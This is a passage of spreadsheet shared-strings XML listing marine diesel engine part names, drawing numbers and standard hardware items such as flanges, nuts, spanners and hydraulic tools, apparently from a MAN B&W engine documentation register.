  <si>
    <t>PMI PARAMETERS</t>
  </si>
  <si>
    <t>5695462-5.0</t>
  </si>
  <si>
    <t>PMI INSTALL AND SETUP</t>
  </si>
  <si>
    <t>5354204-2.2</t>
  </si>
  <si>
    <t>0741809-9.3</t>
  </si>
  <si>
    <t>QS: NITROGEN BOOSTER UNIT</t>
  </si>
  <si>
    <t>0743908-1.1</t>
  </si>
  <si>
    <t>PR, FLUSHING OF ME-SYSTEM</t>
  </si>
  <si>
    <t>0743523-3.2</t>
  </si>
  <si>
    <t>ME FILTER, FIRST TIME APP</t>
  </si>
  <si>
    <t>0743608-5.2</t>
  </si>
  <si>
    <t>QS ACCUMULATOR AND DISTRI</t>
  </si>
  <si>
    <t>0743703-1.0</t>
  </si>
  <si>
    <t>ENGINE, MANOEUVRING SYSTE</t>
  </si>
  <si>
    <t>5614755-7.1</t>
  </si>
  <si>
    <t>ENGINE, LOAD DEP C.W. CIR</t>
  </si>
  <si>
    <t>ENGINE, CONTROL EQ. AUX.</t>
  </si>
  <si>
    <t>FITTED BOLT, WITH TOOL TH</t>
  </si>
  <si>
    <t>3171811-0.0</t>
  </si>
  <si>
    <t>GAS BLOCK VARIOUS PIPES</t>
  </si>
  <si>
    <t>REQUIREMENT SPECIFICATION</t>
  </si>
  <si>
    <t>5684477-2.0</t>
  </si>
  <si>
    <t>ENGINE, MONITORING</t>
  </si>
  <si>
    <t>5690840-8.0</t>
  </si>
  <si>
    <t>LUB. OIL BOTTOM TANK</t>
  </si>
  <si>
    <t>HEATING TANK FOR CYL. OIL</t>
  </si>
  <si>
    <t>0785247-0.4</t>
  </si>
  <si>
    <t>CRANE BEAM FOR AC</t>
  </si>
  <si>
    <t>5179399-9.0</t>
  </si>
  <si>
    <t>1072-0200 HOLD-DOWN BOLTS</t>
  </si>
  <si>
    <t>1072-0200-0004.0</t>
  </si>
  <si>
    <t>ENGINE ROOM,PLACEMENT OF</t>
  </si>
  <si>
    <t>PACKING-SILICONE PASTE SE</t>
  </si>
  <si>
    <t>EN14AM0.100.0</t>
  </si>
  <si>
    <t>AXIAL VIBR. DAMPER, UPPER</t>
  </si>
  <si>
    <t>5614273-9.1</t>
  </si>
  <si>
    <t>AXIAL VIBR. DAMPER, LOWER</t>
  </si>
  <si>
    <t>5614274-0.0</t>
  </si>
  <si>
    <t>EN51P1650.0</t>
  </si>
  <si>
    <t>GLUE FOR METAL, THREAD LO</t>
  </si>
  <si>
    <t>CYL.STOP PINS, LOW HEADS</t>
  </si>
  <si>
    <t>EN1D828.0</t>
  </si>
  <si>
    <t>BANJs6*O COUPLINGS, COMPL</t>
  </si>
  <si>
    <t>EN1Q618.0</t>
  </si>
  <si>
    <t>CAMSHAFT HOUSING AND BASE</t>
  </si>
  <si>
    <t>HYDRAULIC CYLINDER UNIT (</t>
  </si>
  <si>
    <t>5622349-0.6</t>
  </si>
  <si>
    <t>PRESSURE TEST FLANGE</t>
  </si>
  <si>
    <t>5622865-3.0</t>
  </si>
  <si>
    <t>HYDRAULIC SAFETY BLOCK</t>
  </si>
  <si>
    <t>HYDRALIC PIPE (MAIN)</t>
  </si>
  <si>
    <t>5630022-3.5</t>
  </si>
  <si>
    <t>5622030-1.0</t>
  </si>
  <si>
    <t>STARTING VALVE, CYLINDER</t>
  </si>
  <si>
    <t>ARRANGEMENT OF JUNCTION B</t>
  </si>
  <si>
    <t>5612232-2.0</t>
  </si>
  <si>
    <t>MTB 21, WIRING DIAGRAM</t>
  </si>
  <si>
    <t>2057200-5.3</t>
  </si>
  <si>
    <t>ARR. OF JUNCTION BOX &amp; CA</t>
  </si>
  <si>
    <t>5572310-0.0</t>
  </si>
  <si>
    <t>CABLE TIES, STAINLESS STE</t>
  </si>
  <si>
    <t>EN720AA00460362.0</t>
  </si>
  <si>
    <t>SPRING, COMPRESSION, RIGH</t>
  </si>
  <si>
    <t>5155468-8.2</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 250</t>
  </si>
  <si>
    <t>FRAME BOX, VARIOUS PIPES</t>
  </si>
  <si>
    <t>5643978-2.1</t>
  </si>
  <si>
    <t>DRAIN PIPE, HCU</t>
  </si>
  <si>
    <t>5643059-2.0</t>
  </si>
  <si>
    <t>5648140-8.0</t>
  </si>
  <si>
    <t>TAPER WASHER F. U-PROFILE</t>
  </si>
  <si>
    <t>THREE-WAY COCKS</t>
  </si>
  <si>
    <t>EN186N0040.0</t>
  </si>
  <si>
    <t>FUEL OIL PIPE, INLET - OU</t>
  </si>
  <si>
    <t>5647828-3.1</t>
  </si>
  <si>
    <t>BALL VALVE W. ACTUATOR</t>
  </si>
  <si>
    <t>5179020-1.0</t>
  </si>
  <si>
    <t>JACKET COOLING WATER, INL</t>
  </si>
  <si>
    <t>5657653-6.0</t>
  </si>
  <si>
    <t>TEES, WITH CERTIFICATE</t>
  </si>
  <si>
    <t>EN150CB0114.0</t>
  </si>
  <si>
    <t>EXHAUST VALVE, AIR SPRING</t>
  </si>
  <si>
    <t>5647099-6.0</t>
  </si>
  <si>
    <t>LUB. OIL VALVE+ACTUATOR</t>
  </si>
  <si>
    <t>5638594-5.1</t>
  </si>
  <si>
    <t>START-UP PUMPS WITH PIPES</t>
  </si>
  <si>
    <t>ARR. OF PRESSURE SWITCHES</t>
  </si>
  <si>
    <t>5356908-7.0</t>
  </si>
  <si>
    <t>SECTIONAL IRON, T</t>
  </si>
  <si>
    <t>AIRCOOLER FRAME-AFT, MACH</t>
  </si>
  <si>
    <t>EN51P1035.0</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. &gt;45</t>
  </si>
  <si>
    <t>EXHAUST RECEIVER TC. CON</t>
  </si>
  <si>
    <t>5637967-9.1</t>
  </si>
  <si>
    <t>I-PROFILES TYPE HEM</t>
  </si>
  <si>
    <t>EN43Q01401170.0</t>
  </si>
  <si>
    <t>5629842-7.0</t>
  </si>
  <si>
    <t>STANCHION WITH BASE, COMP</t>
  </si>
  <si>
    <t>5602587-6.1</t>
  </si>
  <si>
    <t>STEEL BARS</t>
  </si>
  <si>
    <t>RHS STEEL PIPES RECTANGUL</t>
  </si>
  <si>
    <t>EN43RH80400658.0</t>
  </si>
  <si>
    <t>EN150AL00200021.0</t>
  </si>
  <si>
    <t>BUSHINGS</t>
  </si>
  <si>
    <t>THERMOMETER, LIQUID/STRAI</t>
  </si>
  <si>
    <t>5614959-5.0</t>
  </si>
  <si>
    <t>MC PROD.REC,INSTAL.OF ENG</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARGING STUD</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>1450012-1.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5676281-2.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5645104-6.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5615975-5.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5618181-4.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0791340-9.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>HCU</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5637181-7.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5625619-1.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5645311-8.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5632212-7.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5638026-7.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ASSEMBLY OF SIDE CHOCK</t>
  </si>
  <si>
    <t>0781979-3.4</t>
  </si>
  <si>
    <t>1072-0500-0001.1</t>
  </si>
  <si>
    <t>FUEL OIL CHANGE-OVER PROC</t>
  </si>
  <si>
    <t>CONTROL COVER + CARTRIDGE</t>
  </si>
  <si>
    <t>5318446-6.0</t>
  </si>
  <si>
    <t>PRESSURE RELIEF VALVE, CA</t>
  </si>
  <si>
    <t>5282430-4.0</t>
  </si>
  <si>
    <t>GAS AND AIR SYSTEM</t>
  </si>
  <si>
    <t>P91000-0018.0</t>
  </si>
  <si>
    <t>2270-0400 Piston Panel To</t>
  </si>
  <si>
    <t>2270-0400-0035.0</t>
  </si>
  <si>
    <t>3128907-4.3</t>
  </si>
  <si>
    <t>2270-0430 PISTON GUIDE TO</t>
  </si>
  <si>
    <t>2270-0610 CYLINDER LINER</t>
  </si>
  <si>
    <t>2270-0610-0001.0</t>
  </si>
  <si>
    <t>2270-0248 PISTON LIFTING</t>
  </si>
  <si>
    <t>2270-0480-0001.0</t>
  </si>
  <si>
    <t>TEST EQUIP. F ACCUMULATOR</t>
  </si>
  <si>
    <t>5001623-5.8</t>
  </si>
  <si>
    <t>TEST EQUIPMENT FOR ACCUMU</t>
  </si>
  <si>
    <t>P90674-0001.0</t>
  </si>
  <si>
    <t>4570-0540 EQUIP. FOR TEST</t>
  </si>
  <si>
    <t>4570-0540-0001.0</t>
  </si>
  <si>
    <t>SCREW-SPECIAL, HEXAGON HE</t>
  </si>
  <si>
    <t>5032997-9.0</t>
  </si>
  <si>
    <t>EQUIPMENT FOR SPECIAL RUN</t>
  </si>
  <si>
    <t>P90365-0001.0</t>
  </si>
  <si>
    <t>6670-0100-0001.0</t>
  </si>
  <si>
    <t>BRACKET, SUPPORT OF CROSS</t>
  </si>
  <si>
    <t>HOOK WRENCH FOR ACCUMULAT</t>
  </si>
  <si>
    <t>5575638-8.2</t>
  </si>
  <si>
    <t>4570-0550 ACCUMULATOR TOO</t>
  </si>
  <si>
    <t>4570-0550-0004.0</t>
  </si>
  <si>
    <t>TOOLS FOR ACCUMULATOR</t>
  </si>
  <si>
    <t>P90653-0006.0</t>
  </si>
  <si>
    <t>4270-0010 Fuel System Pan</t>
  </si>
  <si>
    <t>4270-0010-0033.0</t>
  </si>
  <si>
    <t>4270-0900-0003.0</t>
  </si>
  <si>
    <t>Mount Tool, Top Cover Sea</t>
  </si>
  <si>
    <t>7670-0600-0010.0</t>
  </si>
  <si>
    <t>STEEL BALL-SOLID</t>
  </si>
  <si>
    <t>1470-0310-0005.1</t>
  </si>
  <si>
    <t>SPRING, COMPR., RECTANGUL</t>
  </si>
  <si>
    <t>CHAIN TIGHTENER, HYDR. JA</t>
  </si>
  <si>
    <t>5026441-3.6</t>
  </si>
  <si>
    <t>1470-0500-0032.0</t>
  </si>
  <si>
    <t>EXH. VALVE ACTUATOR, HYDR</t>
  </si>
  <si>
    <t>1070-0300 Hydr. Tools for</t>
  </si>
  <si>
    <t>1070-0300-0007.0</t>
  </si>
  <si>
    <t>LOCATING WASHER, SHAFT/HO</t>
  </si>
  <si>
    <t>5067121-3.0</t>
  </si>
  <si>
    <t>HOLD.DOWN/END CHOCK, HYDR</t>
  </si>
  <si>
    <t>5075123-1.2</t>
  </si>
  <si>
    <t>Hydr.Tool - Holding-Down</t>
  </si>
  <si>
    <t>P91265-0019.0</t>
  </si>
  <si>
    <t>1070-0220 HYDR. TOOLS F.</t>
  </si>
  <si>
    <t>1070-0220-0008.0</t>
  </si>
  <si>
    <t>LOCTITE</t>
  </si>
  <si>
    <t>04.10170-9242.0</t>
  </si>
  <si>
    <t>END CHOCK, HYDR. JACKS</t>
  </si>
  <si>
    <t>5092840-0.4</t>
  </si>
  <si>
    <t>1070-0200 Hydr. Tools for</t>
  </si>
  <si>
    <t>1070-0200-0002.0</t>
  </si>
  <si>
    <t>Hydraulic Tool - End Choc</t>
  </si>
  <si>
    <t>P91266-0009.0</t>
  </si>
  <si>
    <t>CYLINDER COVER, HYDR. JAC</t>
  </si>
  <si>
    <t>5696871-6.0</t>
  </si>
  <si>
    <t>CYL. JACKET INTERMEDIATE PIECE</t>
  </si>
  <si>
    <t>TAPER PIN</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>TS LIFTING CHAINS CYL.COV</t>
  </si>
  <si>
    <t>2270-0300-0011.0</t>
  </si>
  <si>
    <t>EXHAUST VALVE, HYDR. JACK</t>
  </si>
  <si>
    <t>2270-0240 Exh Valve Hydr.</t>
  </si>
  <si>
    <t>2270-0240-0011.0</t>
  </si>
  <si>
    <t>LUB. OIL INLET TURBOCHARG</t>
  </si>
  <si>
    <t>5621167-4.0</t>
  </si>
  <si>
    <t>LUB. OIL PIPE-TURBOCHARGE</t>
  </si>
  <si>
    <t>5606090-0.0</t>
  </si>
  <si>
    <t>MAIN PIPE DRAIN</t>
  </si>
  <si>
    <t>5622764-6.0</t>
  </si>
  <si>
    <t>VALVE SEAT SPINDLE GRIND,</t>
  </si>
  <si>
    <t>WORKTABLE; EXH. VALVE, OP</t>
  </si>
  <si>
    <t>WORKTABLE-EXHAUST VALVE   2</t>
  </si>
  <si>
    <t>P90863-0014.1</t>
  </si>
  <si>
    <t>ATOMIZER-DRILLING, DETAIL</t>
  </si>
  <si>
    <t>BEDPLATE, VARIOUS PIPES</t>
  </si>
  <si>
    <t>5696277-4.0</t>
  </si>
  <si>
    <t>CAMSHAFT, LUB. OIL PIPE I</t>
  </si>
  <si>
    <t>5696278-6.0</t>
  </si>
  <si>
    <t>LUB. OIL PIPE-CAMSHAFT</t>
  </si>
  <si>
    <t>5675344-3.0</t>
  </si>
  <si>
    <t>LUBRICATING PIPE, CHAIN D</t>
  </si>
  <si>
    <t>5696519-6.0</t>
  </si>
  <si>
    <t>Exhaust Actuator - Inlet</t>
  </si>
  <si>
    <t>P90808-0009.0</t>
  </si>
  <si>
    <t>4572-0110 EXH. ACTUATOR-</t>
  </si>
  <si>
    <t>4572-0110-0004.0</t>
  </si>
  <si>
    <t>2272-0200-0013.1</t>
  </si>
  <si>
    <t>TS LIFT.TOOL, EXH.VALVE,</t>
  </si>
  <si>
    <t>TS LIFT. TOOL, EXHAUST VA</t>
  </si>
  <si>
    <t>5197706-6.1</t>
  </si>
  <si>
    <t>TS LIFT. TOOL, ROLLER GUI</t>
  </si>
  <si>
    <t>5197709-1.1</t>
  </si>
  <si>
    <t>CAUGE EXH. VALVE SPINDLE</t>
  </si>
  <si>
    <t>5702773-6.0</t>
  </si>
  <si>
    <t>WELDING NIPPLES W. O-RING</t>
  </si>
  <si>
    <t>EN8AZ10.2</t>
  </si>
  <si>
    <t>4272-0200-0009.0</t>
  </si>
  <si>
    <t>PCBA</t>
  </si>
  <si>
    <t>SHIM FOR GUIDE STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Conn. Rod, Compression Sh</t>
  </si>
  <si>
    <t>5707717-8.1</t>
  </si>
  <si>
    <t>TECHN. DATA - PERFORM. SP</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5075323-2.4</t>
  </si>
  <si>
    <t>SITE TRIAL,MC-S</t>
  </si>
  <si>
    <t>SPRING   (INNER)</t>
  </si>
  <si>
    <t>WOODWARD ARM. 145227</t>
  </si>
  <si>
    <t>OIL PANREGISTER BLAD</t>
  </si>
  <si>
    <t>DRIVING GEAR</t>
  </si>
  <si>
    <t>VIBRATION CONTROL</t>
  </si>
  <si>
    <t>AFTMOST MAIN BEARING</t>
  </si>
  <si>
    <t>FUEL SYSTEM</t>
  </si>
  <si>
    <t>NON RETURN VALVE, PROCED.</t>
  </si>
  <si>
    <t>ELECTRONICS</t>
  </si>
  <si>
    <t>CONTROL SYSTEM</t>
  </si>
  <si>
    <t>TORQUE SPANNER, PROCEDURE</t>
  </si>
  <si>
    <t>LUBRICATING, PROCEDURE</t>
  </si>
  <si>
    <t>INSTRUCTION BOOKS</t>
  </si>
  <si>
    <t>3506001-9.3</t>
  </si>
  <si>
    <t>P90002-0001.0</t>
  </si>
  <si>
    <t>DESCRIPTION&amp;MAINTENANCE S</t>
  </si>
  <si>
    <t>CHECKING AND MAINT.SCHEDU</t>
  </si>
  <si>
    <t>A90050-0296.1</t>
  </si>
  <si>
    <t>EMISSION, SCR CONNECTION</t>
  </si>
  <si>
    <t>FRAMEBOX SUPPORTING JIG</t>
  </si>
  <si>
    <t>0743745-0.0</t>
  </si>
  <si>
    <t>0743759-4.3</t>
  </si>
  <si>
    <t>ADDITIONAL PARTS</t>
  </si>
  <si>
    <t>EXHAUST GAS OUTLET PIPE</t>
  </si>
  <si>
    <t>B60Z0048</t>
  </si>
  <si>
    <t>WELD ON-SOCKET</t>
  </si>
  <si>
    <t>EN170L2690</t>
  </si>
  <si>
    <t>HEAGON BOLT</t>
  </si>
  <si>
    <t>EN61Y20100</t>
  </si>
  <si>
    <t>LUB. OIL OUTLET</t>
  </si>
  <si>
    <t>B6010007a</t>
  </si>
  <si>
    <t>HEXAGON BOSS</t>
  </si>
  <si>
    <t>B60Z0069</t>
  </si>
  <si>
    <t>B60Z0064</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>BWMS AND WIO</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>PR INSTAL. OF FITTED BOLT</t>
  </si>
  <si>
    <t>0743969-1.0</t>
  </si>
  <si>
    <t>P90261-0109.0</t>
  </si>
  <si>
    <t>HOLD.DOWN, HYDR. JACKS</t>
  </si>
  <si>
    <t>Penn locking nuts,special</t>
  </si>
  <si>
    <t>Nuts for hydraulic tightening</t>
  </si>
  <si>
    <t>Penn locking rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Wing nuts with WG</t>
  </si>
  <si>
    <t>Nuts with WFG</t>
  </si>
  <si>
    <t>Lubricator with tap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nuts with WG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Philidas nuts</t>
  </si>
  <si>
    <t>Castle and slotted nuts with ISO-M</t>
  </si>
  <si>
    <t>Self-locking hexagon nuts</t>
  </si>
  <si>
    <t>Hexagon Nut, stainless steel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nuts with SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Counter nuts for pull rods</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Rail holder, complete </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe coupling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top sleeve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe piece for stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stud for stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Text sheet for stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Railing-arangement (stanchion with base)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stanchions with base,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stanchions with stud,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe pieces for stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Examples for fitting of stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scraping rings, oil holes</t>
  </si>
  <si>
    <t>Tension springs</t>
  </si>
  <si>
    <t>Cable, Multicore</t>
  </si>
  <si>
    <t>Multicore Cable, Data</t>
  </si>
  <si>
    <t>Cable tray, perforated</t>
  </si>
  <si>
    <t>Cable tray, mech</t>
  </si>
  <si>
    <t>Cable tray, strap-plate</t>
  </si>
  <si>
    <t>Cable Conduit</t>
  </si>
  <si>
    <t>Mounting Rails, top hat</t>
  </si>
  <si>
    <t>Pipe holders with 1 fastening lug</t>
  </si>
  <si>
    <t>Pipe holders with 2 fastening lugs</t>
  </si>
  <si>
    <t>Clips 20 mm, complete</t>
  </si>
  <si>
    <t>Clips 30 mm, complete</t>
  </si>
  <si>
    <t>Spacer tubulars</t>
  </si>
  <si>
    <t>Glue for metal, Nut lock</t>
  </si>
  <si>
    <t>Glue for metal, Thread locking</t>
  </si>
  <si>
    <t>Glue for metal, Stud lock</t>
  </si>
  <si>
    <t>Glue for metal, Activator/Primer</t>
  </si>
  <si>
    <t>Glue for metal, Pipe sealant</t>
  </si>
  <si>
    <t>MAN B&amp;W Diesel A/S</t>
  </si>
  <si>
    <t>Conical serrated lock washers</t>
  </si>
  <si>
    <t>Cam Lock Nut</t>
  </si>
  <si>
    <t>Cam Lock Washers, Stainless Steel</t>
  </si>
  <si>
    <t>Taper washers for U-profiles</t>
  </si>
  <si>
    <t>Cylindrical stop pins, high heads</t>
  </si>
  <si>
    <t>Cylindrical stop pins, low heads</t>
  </si>
  <si>
    <t>Cylindrical dowels with threaded hole</t>
  </si>
  <si>
    <t>Tapered dowels with fixed length of taper</t>
  </si>
  <si>
    <t>Tapered dowels with variable length of taper</t>
  </si>
  <si>
    <t>Blind rivet, stainless steel</t>
  </si>
  <si>
    <t>Studs, metal end ~ 1.25d</t>
  </si>
  <si>
    <t>Studs, metal end ~ 1.25d and with special thread tolerance</t>
  </si>
  <si>
    <t>Hexagon head tapping screws</t>
  </si>
  <si>
    <t>Hexagon socket countersunk head screws</t>
  </si>
  <si>
    <t>Hexagon socket head cap screws acid-resisting</t>
  </si>
  <si>
    <t>Hexagon head screws with special thread tolerance</t>
  </si>
  <si>
    <t>Hexagon head screws, stainless steel</t>
  </si>
  <si>
    <t>Hexagon head screws, with shaft</t>
  </si>
  <si>
    <t>Hexagon socket set screws with dog point</t>
  </si>
  <si>
    <t>Hexagon socket set screw with flat point</t>
  </si>
  <si>
    <t>Hexagon socket set screw with cup point</t>
  </si>
  <si>
    <t>Hexagon head set screws with dog point</t>
  </si>
  <si>
    <t>Nuts EN91P-</t>
  </si>
  <si>
    <t>Nuts, low</t>
  </si>
  <si>
    <t>Retaining rings for shafts</t>
  </si>
  <si>
    <t>Retaining rings for borings</t>
  </si>
  <si>
    <t>Straightway cocks, male and female</t>
  </si>
  <si>
    <t>MK-Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe standards,introduction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seamless steel pipes with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seamless precision steel pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Precision steel pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nipples with SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe branches</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bottoms</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Vent and test cocks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure gauge cocks with insulated handle,female and female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Angle valve with 2 nipples and 1 hexagon</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straightway valves,female and female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Manometer vavle,male and female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball valves, with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Butterfly valves, annular housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Glue for metal</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Edged flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Square blank flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oval blank flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>inner flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Outer flange Connection measurement for Tn 10 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Adaptor inner flanges </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slip-on flages working pressure 40 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Weld-on flanges working pressure 10 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Weld-on flanges working pressure 16 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blank flanges working pressure 10 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blank flanges working pressure 16 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oval flanges working pressure 6 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blank flanges (oval) working pressure 6 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Square flanges working pressure 2.5 and 6 bar</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flanges for exhaust pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flanges for exhaust pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bos spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Forged-bent screw shackles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw for shackles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scocket spanners for hexagon sockets</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Box for box spanner set inch size</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Box spanner set for inside hexagon-inch size</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spanner diagram for box spanner set N549H1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Single ended spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Single open ended impact spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spanner racks for combined ring and open-end spanners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring impact spanners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring spanners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Combination spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pin gauges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends, 90 deg.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Standard pins, summary</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Graph for retaining rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bending radii for steel pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flange assembly for MK-pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hardness comparisons for steel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Counterbores for hexagon socket head cap screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Countersinks for countersunk head screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Datums and datum-systems for geometrical tolerances</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>key steel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Dimensions and clearances for fitting and sliding keys </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rough-borings for stop screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Centre holes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Roundings and chamferings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Securing of studs(in fitting end)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tightening torque</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shrinkage fittings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spanners,nuts and bolts,tolerances of dimension S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spanners,jaw dimensions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fitted squares for stationary machine parts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connecting squares for manually-operated tightening tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Squares for tools</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
